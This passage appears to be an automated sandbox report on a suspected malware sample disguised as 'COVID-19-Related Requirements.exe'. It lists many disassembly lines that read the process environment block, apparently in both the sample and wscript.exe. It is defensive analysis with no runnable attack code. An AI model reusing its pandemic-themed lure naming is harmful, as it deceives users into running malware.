          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E70EA5 mov eax, dword ptr fs:[00000030h]
